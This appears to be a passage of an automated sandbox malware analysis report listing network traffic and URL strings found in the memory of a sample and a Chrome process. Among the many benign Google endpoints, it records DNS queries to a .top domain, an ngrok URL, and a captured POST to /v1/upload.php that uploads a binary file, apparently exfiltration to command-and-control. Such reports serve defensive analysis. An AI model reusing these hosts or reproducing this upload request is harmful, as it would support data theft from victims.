#logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/< equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2408941027.0000285400C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcap equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2409003679.0000285400C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------pYYjhWy1oYCwrN4mefAuztData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 59 59 6a 68 57 79 31 6f 59 43 77 72 4e 34 6d 65 66 41 75 7a 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 69 73 65 79 65 67 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a de f9 a8 ef 91 39 f2 7b 9b 80 d0 a5 26 c9 1f 59 21 42 11 23 d4 a1 af f9 41 e1 16 62 90 d0 3c fc 00 f6 0b 61 bd 83 f1 25 47 b7 a5 39 34 87 ad 6c 45 0e 98 9e cd de 2b 60 a0 96 1b ed a0 76 23 1c 6c e3 8d ba 03 c1 b0 64 53 65 66 15 40 91 b0 11 5c 25 1e d2 20 9e b3 33 eb 1f 31 0f 51 e1 1a 8d ae 84 c3 88 30 46 31 d0 ce 61 ea dc 88 40 f4 cd ba af 5e 4a 38 b2 bd ea db 96 6f 70 81 f3 d9 3e 7f 4c a0 2e b8 b9 dd 5c 68 92 5e 79 4a a4 df a8 ae a9 7a ea 22 f4 a7 a8 3b a8 6a ba ab 28 2a 03 81 c5 45 bb 4d b3 c8 a0 5f 3a 6d 55 4c 47 cd ec 7c ed 0a d6 e7 31 c0 52 15 8a fc 64 f8 12 8d d7 09 e7 c2 c9 45 10 be 28 74 2d 7a cc 27 eb 88 01 db 9b a9 08 b4 7f 53 14 3f 18 b6 3a 18 a4 b3 bb 76 3b fa f2 24 3d 0b 2b 02 21 7d 42 3b 8f eb 1d f5 80 d1 6b c9 ff 7a 17 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 59 59 6a 68 57 79 31 6f 59 43 77 72 4e 34 6d 65 66 41 75 7a 74 2d 2d 0d 0a Data Ascii: --------------------------pYYjhWy1oYCwrN4mefAuztContent-Disposition: form-data; name="file"; filename="Viseyeg.bin"Content-Type: application/octet-stream9{&Y!B#Ab<a%G94lE+`v#ldSef@\% 31Q0F1a@^J8op>L.\h^yJz";j(*EM_:mULG|1RdE(t-z'S?:v;$=+!}B;kz--------------------------pYYjhWy1oYCwrN4mefAuzt--
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000003.00000002.2404100505.000028540010C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 00000003.00000002.2403342510.0000285400082000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs(T
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/b
Source: Amcache.hve.12.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000003.00000002.2403742755.00002854000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000003.00000002.2403742755.00002854000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet(T
Source: chrome.exe, 00000003.00000002.2404951820.00002854003B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000003.00000002.2405839976.000028540069C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2380718468.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405005873.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383596431.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381745231.0000285400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardn
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout2
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000003.00000002.2408363061.0000285400AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000003.00000002.2403742755.00002854000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revokeT(
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin(
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000003.00000002.2405839976.000028540069C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000003.00000003.2381440086.0000285400CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000003.00000002.2408941027.0000285400C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408203681.0000285400A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381417664.0000285400C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2382029111.0000285400C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409105091.0000285400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2382380367.0000285400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409064457.0000285400CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381635634.0000285400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407498885.00002854008CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2382000328.0000285400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381440086.0000285400CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreT(
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g2
Source: chrome.exe, 00000003.00000003.2369613954.00005DEC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2369596532.00005DEC002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000003.00000002.2404071818.00002854000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406648522.0000285400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405808387.000028540068C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.0000285400712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b(T
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404198718.0000285400158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404198718.0000285400158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404198718.0000285400158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000003.00000002.2408449007.0000285400AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2408449007.0000285400AF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappT(
Source: chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapplt
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
